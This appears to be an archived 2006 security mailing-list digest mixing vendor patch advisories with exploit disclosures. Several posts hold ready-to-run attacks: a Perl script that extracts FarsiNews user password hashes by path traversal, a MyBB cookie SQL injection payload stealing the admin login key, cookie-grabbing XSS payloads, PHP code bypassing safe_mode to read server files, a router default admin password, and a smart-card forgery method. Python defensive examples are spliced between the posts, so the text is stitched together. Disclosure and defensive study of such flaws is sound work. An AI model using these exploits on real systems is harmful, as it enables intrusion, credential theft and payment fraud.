http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3631

9. Contact:

The Fedora Legacy security contact is [EMAIL PROTECTED]. More
project details at http://www.fedoralegacy.org

-




Re: NETGEAR WGT624 Wireless DSL router default user name/password vulnerability

2006-02-28 Thread James Garrison

Not my WG602v2.

[EMAIL PROTECTED] wrote:

Netgear WG602 reportedly contains a default administrative account. This issue 
can allow a remote attacker to gain administrative access to the device.

super_username=Gearguy 
super_passwd=Geardog



  




Fedex Kinkos Smart Card Authentication Bypass

2006-02-28 Thread Lance James
Abstract:
-
The ExpressPay stored-value card system used by FedEx Kinko's is
vulnerable to attack.  An attacker who gains the ability to alter the
data stored on the card can use FedEx Kinko's services fraudulently
and anonymously, and can even obtain cash from the store.


Description:

The FedEx Kinko's ExpressPay system, developed by enTrac Technologies
of Toronto, Ontario, is based on a Siemens / Infineon SLE4442 memory
chip card.  The data stored on this card is freely rewritable once a
three-byte security code has been presented to the card's security
logic.  Neither this security code nor the data stored on the card is
encrypted; anyone able to obtain the security code is free to rewrite
the data stored on the card using an inexpensive commercially
available smart card reader/writer.

The first thirty-two bytes of the memory chip card are writable and
subsequently permanently write-protectable (in this application, these
bytes are write-protected), and contain a header which identifies the
card as an ExpressPay stored-value card.  Bytes 0x20 through 0x27
contain the value stored on the card, represented in IEEE 754
double-precision floating point format.  Bytes 0x60 through 0x6A
contain the card's eleven-digit serial number stored as unsigned
zoned-decimal ASCII; digits 0x60 through 0x63 are the store number the
card was initially issued at, and the remaining seven digits are
assigned sequentially at the moment of first issue.  A timestamp
indicating the date and time of issue is located from 0x30 through 0x37,
and is repeated from 0xC7 through 0xCE.

In order to write to the card, a three-byte security code must be
presented in a specific sequence of commands as outlined by the
SLE4442's white paper.  By soldering wires to the contact points of
the card and then connecting those wires to an inexpensive logic
analyzer, an attacker can sniff the three-byte code as the kiosk or a
card terminal prepares to write data to the card.  This security code
appears to be the same across all FedEx Kinko's ExpressPay cards
currently in circulation.

Once the three-byte code is known to the attacker, the card's stored
value and serial number can be changed to any value.  The ExpressPay
system appears to implicitly trust the value stored on the card,
regardless of what that value actually is.  The system will also
accept cards with obviously fake serial numbers (e.g. a non-existent
store number followed by all nines).  Using these altered cards,
xeroxes can be made from any machine with a card reader, and computers
can be rented anonymously and indefinitely.  Most disturbing, however,
is that since stored-value cards can be cashed out by an employee at
the register at any time, an attacker could cash out altered cards
obtained at little or no monetary cost.  If a card is cashed out, its
serial number does not appear to be invalidated in the system.  If an
attacker were to clone a known good card and cash it out, the clone
would still be usable.


Tested Vendors:
---
- FedEx Kinko's


Suspected Vendors:
--
- Any client of enTrac Technologies who uses the ExpressPay
stored-value card system.
- Any company which uses a stored-value card system based on the SLE4442


Vendor and Patch Information:
-
Proof-of-concept of the initial security vulnerability was achieved on
8 February 2006, with research into the ramifications continuing
through 12 February.  Copies of this report were sent to both FedEx
Kinko's and enTrac Technologies on 15 February; a read receipt was
returned from enTrac on 19 February, while no receipt has yet been
received from FedEx Kinko's.


Solution:
-
- Encrypt data before storing it on the SLE4442 card, or migrate to a
system which uses cards which have built-in encryption functionality.
- Verify that the stored value on the card does not significantly
differ from a reference value stored in a database.
- Do not allow the use of cards with invalid serial numbers.
- Invalidate serial numbers of cards that are cashed out.
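The four countermeasures above amount to one design rule: the card is a pointer, the database is the value. The following is an added example, not code from this report and not part of enTrac's ExpressPay system, showing a server-side ledger that enforces all four: the balance the card reports is only compared against the ledger, serials are checked against known store numbers and the all-nines placeholder pattern the report mentions, and a cashed-out serial is invalidated so a clone cannot be reused. The store numbers, the 12-digit serial layout (4-digit store number + 8-digit sequence) and the zero-tolerance drift setting are constructed assumptions.

```python
"""Server-side reference ledger for a stored-value card system.

Added example; not code from the original report and not part of the
ExpressPay system. The database of record, not the card, holds the value.
Store numbers, serial layout and drift tolerance are constructed.
"""
from dataclasses import dataclass, field

KNOWN_STORES = {"0101", "0102", "0250"}  # constructed store numbers
MAX_DRIFT_CENTS = 0                      # any card/ledger disagreement is rejected


@dataclass
class CardRecord:
    serial: str
    balance_cents: int
    cashed_out: bool = False


@dataclass
class Ledger:
    cards: dict = field(default_factory=dict)

    def issue(self, serial: str, balance_cents: int) -> None:
        """Record a newly issued card; only the issuing kiosk calls this."""
        self.cards[serial] = CardRecord(serial, balance_cents)

    def serial_is_valid(self, serial: str) -> bool:
        """Reject malformed serials, unknown store numbers, the all-nines
        placeholder, and serials that were never issued by a kiosk."""
        if len(serial) != 12 or not serial.isdigit():
            return False
        store, sequence = serial[:4], serial[4:]
        if store not in KNOWN_STORES or sequence == "9" * 8:
            return False
        return serial in self.cards

    def _lookup(self, serial: str, card_balance_cents: int):
        """Common checks: valid serial, not cashed out, card agrees with ledger."""
        if not self.serial_is_valid(serial):
            return None, "invalid serial"
        rec = self.cards[serial]
        if rec.cashed_out:
            return None, "serial invalidated"
        if abs(rec.balance_cents - card_balance_cents) > MAX_DRIFT_CENTS:
            return None, "card value disagrees with ledger"
        return rec, "ok"

    def authorize(self, serial: str, card_balance_cents: int, amount_cents: int):
        """Debit a purchase. The ledger balance, never the card's, is debited."""
        rec, reason = self._lookup(serial, card_balance_cents)
        if rec is None:
            return False, reason
        if rec.balance_cents < amount_cents:
            return False, "insufficient funds"
        rec.balance_cents -= amount_cents
        return True, "ok"

    def cash_out(self, serial: str, card_balance_cents: int):
        """Pay out the ledger balance and invalidate the serial for good."""
        rec, reason = self._lookup(serial, card_balance_cents)
        if rec is None:
            return 0, reason
        paid = rec.balance_cents
        rec.balance_cents = 0
        rec.cashed_out = True
        return paid, "ok"
```

With this in place, a card whose stored value was rewritten fails the ledger comparison at the first transaction, a card with a fabricated serial is refused before any balance is read, and a clone of a cashed-out card is refused because the serial itself is dead. Encrypting the on-card data (the first countermeasure) would additionally stop a reader with the sniffed three-byte code from producing a plausible forgery, but it is the ledger that removes the card as a source of truth.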


Credits:

Strom Carlson, Secure Science Corporation: Hardware Security Division
[EMAIL PROTECTED]



[FLSA-2006:181014] Updated gnutls packages fix a security issue

2006-02-28 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated gnutls packages fix a security issue
Advisory ID:   FLSA:181014
Issue date:2006-02-27
Product:   Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2006-0645
-


-
1. Topic:

Updated gnutls packages that fix a security issue are now available.

The GNU TLS Library provides support for cryptographic algorithms and
protocols such as TLS. GNU TLS includes Libtasn1, a library developed
for ASN.1 structures management that includes DER encoding and decoding.

2. Relevant releases/architectures:

Fedora Core 3 - i386, x86_64

3. Problem description:

Several flaws were found in the way libtasn1 decodes DER. An attacker
could create a carefully crafted invalid X.509 certificate in such a way
that could trigger this flaw if parsed by an application that uses GNU
TLS. This could lead to a denial of service (application crash). It is
not certain if this issue could be escalated to allow arbitrary code
execution. The Common Vulnerabilities and Exposures project assigned the
name CVE-2006-0645 to this issue.

Users are advised to upgrade to these updated packages, which contain a
backported patch from the GNU TLS maintainers to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=181014

6. RPMs required:

Fedora Core 3:

SRPM:
http://download.fedoralegacy.org/fedora/3/updates/SRPMS/gnutls-1.0.20-3.1.3.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/3/updates/i386/gnutls-1.0.20-3.1.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/gnutls-devel-1.0.20-3.1.3.legacy.i386.rpm

x86_64:
http://download.fedoralegacy.org/fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/gnutls-devel-1.0.20-3.1.3.legacy.x86_64.rpm


7. Verification:

SHA1 sum Package Name
-

87b93af583ea3abaa48337b0a8c71cba97a45410
fedora/3/updates/i386/gnutls-1.0.20-3.1.3.legacy.i386.rpm
dca7e6e11093d7b8528d82cc9c3f5f1b1c78ea23
fedora/3/updates/i386/gnutls-devel-1.0.20-3.1.3.legacy.i386.rpm
87b93af583ea3abaa48337b0a8c71cba97a45410
fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.i386.rpm
742be40634dc2a32b245f78caf610d0a6b45cb75
fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.x86_64.rpm
762630c8973f02bcc934adc8f5a946383f8479cc
fedora/3/updates/x86_64/gnutls-devel-1.0.20-3.1.3.legacy.x86_64.rpm
cce2a463b57be400362624f09dc49a4fdde09305
fedora/3/updates/SRPMS/gnutls-1.0.20-3.1.3.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v filename

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum filename
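The advisory's checksum list prints each digest on one line and the package path on the next, which is not the "digest  path" layout that sha1sum -c reads, so checking a batch of downloads by hand means either reformatting the list or hashing each file yourself. The block below is an added example, not Fedora Legacy tooling: it parses the advisory's alternating-line layout, hashes the downloaded files with hashlib, and reports ok, MISMATCH or missing per package. The package contents, file names and directory used by demo() are constructed for the test; sha1sum only proves the download was not corrupted, the GPG check with rpm --checksig is what proves who built it.

```python
"""Verify downloaded packages against an advisory's SHA1 list.

Added example; not Fedora Legacy's tooling. The advisory lists each
40-hex digest on one line and the package path on the next, so the
block parses that layout itself. demo() uses constructed files.
"""
import hashlib
import os
import tempfile

HEX = set("0123456789abcdef")


def parse_checksum_block(text):
    """Map package path -> expected SHA1 from the alternating-line list.
    Header and separator lines (anything that is not a 40-hex digest) are skipped."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    expected = {}
    i = 0
    while i + 1 < len(lines):
        digest, path = lines[i].lower(), lines[i + 1]
        if len(digest) == 40 and set(digest) <= HEX:
            expected[path] = digest
            i += 2
        else:
            i += 1
    return expected


def sha1_of(path):
    """Stream the file through SHA1 so large RPMs are not read into memory at once."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_downloads(expected, download_dir):
    """Return {advisory path: 'ok' | 'MISMATCH' | 'missing'} for files saved
    flat in download_dir under their basename, as rpm -Fvh *.rpm expects."""
    results = {}
    for rel, digest in expected.items():
        local = os.path.join(download_dir, os.path.basename(rel))
        if not os.path.isfile(local):
            results[rel] = "missing"
        else:
            results[rel] = "ok" if sha1_of(local) == digest else "MISMATCH"
    return results


def demo():
    """Constructed end-to-end run: one good file, one tampered file, one missing."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "good-1.0.legacy.i386.rpm")
        bad = os.path.join(d, "bad-1.0.legacy.i386.rpm")
        with open(good, "wb") as f:
            f.write(b"constructed rpm payload A")
        with open(bad, "wb") as f:
            f.write(b"constructed rpm payload B")  # digest below is deliberately wrong
        block = "\n".join([
            "SHA1 sum Package Name", "-", "",
            sha1_of(good), "fedora/3/updates/i386/good-1.0.legacy.i386.rpm",
            "0" * 40, "fedora/3/updates/i386/bad-1.0.legacy.i386.rpm",
            sha1_of(good), "fedora/3/updates/SRPMS/absent-1.0.legacy.src.rpm",
        ])
        return verify_downloads(parse_checksum_block(block), d)
```

To use it on a real update, paste section 7 of the advisory into parse_checksum_block and point verify_downloads at the directory the RPMs were downloaded to; any MISMATCH should be treated as a bad download and fetched again before rpm -Fvh is run.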

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0645

9. Contact:

The Fedora Legacy security contact is [EMAIL PROTECTED]. More
project details at http://www.fedoralegacy.org

-




FarsiNews 2.5Pro Exploit

2006-02-28 Thread hessamx
#!/usr/bin/perl
#  HESSAM-X
# FarsiNews 2.5Pro Exploit
# Exploit by Hessam-x (www.hessamx.net)
# Iran Hackerz Security Team
# WebSite: www.hackerz.ir
#
# Summary
# Name: FarsiNews [www.farsinewsteam.com]
# version : 2.5Pro
##
# in FarsiNews if you change the archive value :
# http://localhost/index.php?archive=hamid
# see :
# Warning: file([PATH]/data/archives/hamid.news.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 642
# Warning: file([PATH]/data/archives/hamid.comments.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 686
# ...[and many other errors]
# it means that shows.inc.php tries to open '/archives/hamid.news.arch.php'
# (and also 'hamid.comments.arch.php') to read its data.
# we can change the archive value to '/../users.db.php%00' to see all usernames
# and passwords.
# Exploit :
# http://localhost/index.php?archive=/../users.db.php%00
# http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00
# F0und by hamid
use LWP::Simple;

print "---\n";
print "= Farsinews 2.5Pro=\n";
print "=   By Hessam-x  - www.hackerz.ir =\n";
print "---\n\n";


print "Target(www.example.com)\> ";
chomp($targ = <STDIN>);

print "Path: (/fn25/)\>";
chomp($path = <STDIN>);

$url = "index.php?archive=/../users.db.php%00";
$page = get("http://".$targ.$path.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";

$page =~ m/<img alt="(.*?)" src=/ && print "[+] Username: $1\n";
$page =~ m/style="border: none;" align="right" \/>(.*?)<\/font>/ && print "[+] MD5 Password: $1\n";

print "[-] Unable to retrieve User ID\n" if(!$1);

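The defect the post describes is the classic combination of a request parameter concatenated into a filesystem path and a runtime whose file functions stop at the first NUL byte, so the ".news.arch.php" suffix that was meant to constrain the name is silently discarded. The following is an added example, not FarsiNews code: unsafe_archive_path() mirrors the concatenation pattern the post describes, legacy_open_target() shows what a C-string based open() actually receives, and safe_archive_path() is the hardened form a maintainer would want (reject NUL, allowlist the name, confirm the resolved path is still directly under the archive directory). ARCHIVE_DIR and the allowlist pattern are constructed assumptions; the same check applies to any parameter that becomes part of a filename.

```python
"""Validating a filename-derived request parameter.

Added example; not FarsiNews code. ARCHIVE_DIR and SAFE_NAME are
constructed assumptions about the application's layout.
"""
import os
import re

ARCHIVE_DIR = "/var/www/farsinews/data/archives"   # constructed path
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")    # constructed allowlist


def unsafe_archive_path(archive):
    """Vulnerable pattern: the untrusted value is concatenated into the path."""
    return ARCHIVE_DIR + "/" + archive + ".news.arch.php"


def legacy_open_target(path):
    """What a C-string based open() sees: everything after the first NUL is
    dropped, so the trailing '.news.arch.php' no longer constrains the name."""
    return os.path.normpath(path.split("\x00", 1)[0])


def safe_archive_path(archive, base=ARCHIVE_DIR):
    """Hardened form; raises ValueError on anything outside the allowlist."""
    if "\x00" in archive:
        raise ValueError("NUL byte in archive name")
    if not SAFE_NAME.fullmatch(archive):
        raise ValueError("archive name not in allowlist")
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, archive + ".news.arch.php"))
    # Belt and braces: even a slip in the allowlist must not let the path leave base.
    if os.path.dirname(candidate) != base_real:
        raise ValueError("path escapes archive directory")
    return candidate


def is_rejected(archive):
    """True if the hardened resolver refuses this archive name."""
    try:
        safe_archive_path(archive)
    except ValueError:
        return True
    return False
```

Run against the value from the post, unsafe_archive_path() plus legacy_open_target() resolves to the users.db.php file one directory up, which is exactly the warning text the author quotes; the hardened resolver refuses the same input at the NUL check before any path is built.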





EJ3 TOPo - Cross Site Scripting Vulnerability

2006-02-28 Thread mail
- Advisory: EJ3 TOPo Cross Site Scripting Vulnerability
- Author: Yunus Emre Yilmaz || Yns [EMAIL PROTECTED]

- Application: EJ3 TOPo ( http://ej3soft.ej3.net )
- Affected Version : v2.2.178 ( maybe older versions..)
- Risk : Critical

- Details : If an attacker accesses /code/inc_header.php directly, he can bypass
the $gTopNomBer variable. (register_globals must be "on")

The problem is that the variable is neither defined nor filtered.

- Proof Of Concept : access /code/inc_header.php like
inc_header.php?gTopNombre="<script>alert(document.cookie)</script>

and it prints the user's cookie. So an attacker can escape with the admin's cookie.

- Release Date: 2006/02/28
- Contacted to vendor : 2006/02/28


MyBB 1.3 NewSQL Injection

2006-02-28 Thread o . y . 6
MyBB New SQL Injection

D3vil-0x1  Devil-00 

Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320

The Inf.File :- 
misc.php

Linez :-

[code]
$buddies = $mybb->user['buddylist'];

$namesarray = explode(",", $buddies);

if(is_array($namesarray))
{
    while(list($key, $buddyid) = each($namesarray))
    {
        $sql .= "$comma'$buddyid'"; // <== HERE :) Uncleared Var !!
        $comma = ",";
    }

    $timecut = time() - $mybb->settings['wolcutoff'];

    $query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)");
[/code]

From 255 to 265

The GLOBALS unset function .. does not unset $_COOKIES ..
then u can start attacking any var by cookies :)

Tested MyBB 1.3 .. Register_Globals = On

Explorer Exploit :-

1- Login by any username ..
2- Create new cookie (
name= 
comma
value   = 
comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1
 FROM mybb_users WHERE uid=1/*
)

3- Check The URL :- 
HOST/PATH/misc.php?action=buddypopup

Where HOST = The Vic.Server And PATH = MyBB Dir.
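The query side of the bug above is independent of how $comma got seeded: every buddylist element is quoted and concatenated into the IN (...) list, so any element that is not a uid rewrites the statement. The following is an added example, not MyBB code, using Python's sqlite3 with a constructed users table: buddies_vulnerable() reproduces that pattern, and buddies_safe() is the fix, which validates each element as an integer and binds it through a placeholder. The table contents and the INJECTED_BUDDYLIST value are constructed for the demonstration; the register_globals half of the problem (a cookie seeding a local variable) is a PHP configuration matter outside what the query can fix.

```python
"""Building an IN (...) list from an untrusted, comma-separated id list.

Added example; not MyBB code. Uses sqlite3 with a constructed users table.
"""
import sqlite3

# Constructed input: a buddylist element that is not a uid.
INJECTED_BUDDYLIST = "2') UNION SELECT loginkey FROM users WHERE uid=1 --"


def make_db():
    """In-memory users table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT, loginkey TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin", "constructed-admin-loginkey"),
        (2, "bob", "constructed-bob-loginkey"),
        (3, "carol", "constructed-carol-loginkey"),
    ])
    return conn


def buddies_vulnerable(conn, buddylist):
    """String-built IN list, the pattern in the snippet above."""
    sql = ",".join("'%s'" % b for b in buddylist.split(","))
    rows = conn.execute(
        f"SELECT username FROM users WHERE uid IN ({sql}) ORDER BY uid").fetchall()
    return [r[0] for r in rows]


def buddies_safe(conn, buddylist):
    """Validate every element as an integer uid, then bind with placeholders.
    Raises ValueError on any element that is not a non-negative integer."""
    ids = []
    for token in buddylist.split(","):
        token = token.strip()
        if not token:
            continue
        if not token.isdigit():
            raise ValueError(f"buddylist element is not a uid: {token!r}")
        ids.append(int(token))
    if not ids:
        return []
    placeholders = ",".join("?" * len(ids))
    rows = conn.execute(
        f"SELECT username FROM users WHERE uid IN ({placeholders}) ORDER BY uid",
        ids).fetchall()
    return [r[0] for r in rows]


def is_rejected(conn, buddylist):
    """True if buddies_safe refuses the list instead of querying with it."""
    try:
        buddies_safe(conn, buddylist)
    except ValueError:
        return True
    return False
```

The placeholder count is derived from the validated list, so the statement shape is fixed before any user data reaches the database driver; the same construction works for any list of identifiers, not only buddy ids.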


QwikiWiki v1.4 XSS Vulnerability

2006-02-28 Thread drdeath_2006
Software - QwikiWiki
Version - v1.4

Type - XSS Vulnerability
Powered by QwikiWiki v1.4 - www.qwikiwiki.com

Examples:
http://(host)/index.php?page=<body bgcolor=black></body>
http://(host)/index.php?page=<script>alert(document.cookie);</script>

Found by Dr^Death of Suicide Scene Internet Security Group 2006


(PHP) imap functions bypass safemode and open_basedir restrictions

2006-02-28 Thread ced . clerget
Vulnerability in the c-client library (tested with versions 2000, 2001, 2004):
mail_open could be used to open a stream to local files.

For PHP and the imap module:

imap_open allows bypassing safe_mode and open_basedir restrictions.
Use imap_body or others to view a file and imap_list to recursively list a
directory.

s/mailbox/file :)
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
to create, delete, rename files with apache privileges.

# code #

<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>

<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if ($string && $switch == "file") {
    $stream = imap_open($string, "", "");
    if ($stream == FALSE)
        die("Can't open imap stream");

    $str = imap_body($stream, 1);
    if (!empty($str))
        echo "<pre>".$str."</pre>";
    imap_close($stream);
} elseif ($string && $switch == "dir") {
    $stream = imap_open("/etc/passwd", "", "");
    if ($stream == FALSE)
        die("Can't open imap stream");

    $string = explode("|", $string);
    if (count($string) > 1)
        $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
    else
        $dir_list = imap_list($stream, trim($string[0]), "*");
    echo "<pre>";
    for ($i = 0; $i < count($dir_list); $i++)
        echo $dir_list[$i]."\n";
    echo "</pre>";
    imap_close($stream);
}
?>




(PHP) mb_send_mail security bypass

2006-02-28 Thread ced . clerget
Vulnerable: PHP4, PHP5
with use of sendmail 8.13.4

When safe_mode is disabled and an open_basedir restriction is in effect, we can
pass extra parameters to the sendmail command in the mail function, especially
the -C and -X arguments.
-C for alternate configuration file
-X to log all in a file
Can be used to view files: pass the file to view to the C argument and store the
content in the file passed to the X argument.

When safe_mode is enabled and an open_basedir restriction is in effect, we can
pass extra parameters to the sendmail command in the mb_send_mail function.

Solution:
Use another sendmail command and don't allow extra parameters for mb_send_mail
when safe_mode is enabled.

<?php
if (isset($_REQUEST['file'])) {
    $file = "sendlog";
    if (file_exists($file)) unlink($file);
    $extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file;
    mb_send_mail(NULL, NULL, NULL, NULL, $extra);
    echo "<pre>".file_get_contents($file)."</pre>";
}
?>


[security bulletin] SSRT061118 rev.1 - HP System Management Homepage (SMH) Running on Windows: Remote Unauthorized Access

2006-02-28 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00601530
Version: 1

HPSBMA02099 SSRT061118 rev.1 - HP System Management Homepage (SMH)
Running on Windows: Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Release Date: 2006-02-09
Last Updated: 2006-02-27

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company,
HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP
System Management Homepage (SMH) versions 2.0.0 through 2.1.4
running on Microsoft Windows. The vulnerability could be exploited
remotely to allow unauthorized access to files via directory
traversal.

References: None

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) versions 2.0.0 through 2.1.4
running on Microsoft Windows 2000, 2003, 2003 for x64, 2003 for
Itanium and also Windows XP

BACKGROUND

RESOLUTION

HP is providing the following workaround for this issue until such
time as another resolution is available. At that time this
Security Bulletin will be re-released with the latest information.

This workaround involves manually editing the .namazurc file in
the HP SMH installation as described below:

This requires a single line modification to the resource file. The
affected file is located in the installdir\data\help\web_cgi
directory and is called .namazurc.

NOTE: installdir is the base directory where HP SMH is installed.
A typical default installation would be "C:\hp\hpsmh" for
installdir.

First, copy the .namazurc file to a backup location. If there
are problems during the editing process, the original file can be
restored.

Next, edit the .namazurc file. Search for #Lang in the file to
find the following text:

#Lang ja

Depending on the language and version of HP SMH installed, use the
appropriate method below to edit the file:

 * If the HP SMH installation is an English language installation,
   change the line to:

Lang en

 * If the HP SMH installation is a Japanese language installation
   AND
   the version of HP SMH is 2.0.0 through 2.1.3,
   change the line to:

Lang ja

 * If the HP SMH installation is a Japanese language installation
   AND
   the version of HP SMH is 2.1.4,
   change the line to:

Lang ja_JP.SJIS

NOTE: The # at the beginning of the text must be removed.

To complete the change, save the edited .namazurc file and
restart HP SMH.

PRODUCT SPECIFIC INFORMATION


HISTORY:
Version: 1 (rev.1) Initial release - 27 February 2006



Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: [EMAIL PROTECTED]  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
save.

To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page:
  Subscriber's choice for Business: sign-in.
On the web page:
  Subscriber's Choice: your profile summary
- use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number in the title:

GN = HP General SW,
MA = HP Management Agents,
MI = Misc. 3rd party SW,
MP = HP MPE/iX,
NS = HP NonStop Servers,
OV = HP OpenVMS,
PI = HP Printing & Imaging,
ST = HP Storage SW,
TL = HP Trusted Linux,
TU = HP Tru64 UNIX,
UX = HP-UX,
VV = HP Virtual Vault


System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to
bring to the attention of users of the affected HP products the
important security information contained in this Bulletin. HP
recommends that all users determine the applicability of this
information to their individual situations and take 

Re: NETGEAR WGT624 Wireless DSL router default user name/password vulnerability

2006-02-28 Thread Adam Chesnutt

I checked this against my 602v1 also last night, no go

James Garrison wrote:

> Not my WG602v2.
>
> [EMAIL PROTECTED] wrote:
>> Netgear WG602 reportedly contains a default administrative account.
>> This issue can allow a remote attacker to gain administrative access
>> to the device.
>>
>> super_username=Gearguy super_passwd=Geardog





[ MDKSA-2006:051 ] - Updated gettext packages fix temporary file vulnerabilities

2006-02-28 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:051
 http://www.mandriva.com/security/
 ___
 
 Package : gettext
 Date: February 28, 2006
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 The Trustix developers discovered temporary file vulnerabilities in the
 autopoint and gettextize scripts, part of GNU gettext.  These scripts
 insecurely created temporary files which could allow a malicious user
 to overwrite another user's files via a symlink attack.
 
 The updated packages have been patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0966
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 3e90a65b63c6cef50ea2362b97d601af  
corporate/3.0/RPMS/gettext-0.13.1-1.3.C30mdk.i586.rpm
 88645a36cc137b6d15baff31df84bb5f  
corporate/3.0/RPMS/gettext-base-0.13.1-1.3.C30mdk.i586.rpm
 122cf7a4d0173cd80c3c6a388b76ec5a  
corporate/3.0/RPMS/gettext-devel-0.13.1-1.3.C30mdk.i586.rpm
 d9e9d121c5833e80c9bbd642af24fb40  
corporate/3.0/RPMS/gettext-java-0.13.1-1.3.C30mdk.i586.rpm
 7aa6d70debb3c1814333fca662e23cac  
corporate/3.0/RPMS/libgettextmisc-0.13.1-1.3.C30mdk.i586.rpm
 cfe279f682d65f910505e069b911d7c7  
corporate/3.0/RPMS/libintl2-0.13.1-1.3.C30mdk.i586.rpm
 fc15df73311804bf0fd371fa9682c0c5  
corporate/3.0/SRPMS/gettext-0.13.1-1.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c3648f970e7794014773ddedd68eaf91  
x86_64/corporate/3.0/RPMS/gettext-0.13.1-1.3.C30mdk.x86_64.rpm
 d876576394822262df7e2351775c1aaa  
x86_64/corporate/3.0/RPMS/gettext-base-0.13.1-1.3.C30mdk.x86_64.rpm
 af77cf6ee5a7d238ec122fbc4af7d353  
x86_64/corporate/3.0/RPMS/gettext-devel-0.13.1-1.3.C30mdk.x86_64.rpm
 1173d049f6621cd8ff8d0396d24eb097  
x86_64/corporate/3.0/RPMS/gettext-java-0.13.1-1.3.C30mdk.x86_64.rpm
 f757f8a584bfc7ebd99d13a92415241b  
x86_64/corporate/3.0/RPMS/lib64gettextmisc-0.13.1-1.3.C30mdk.x86_64.rpm
 ecb7b9c26a607287c10f12bc70d5ffa9  
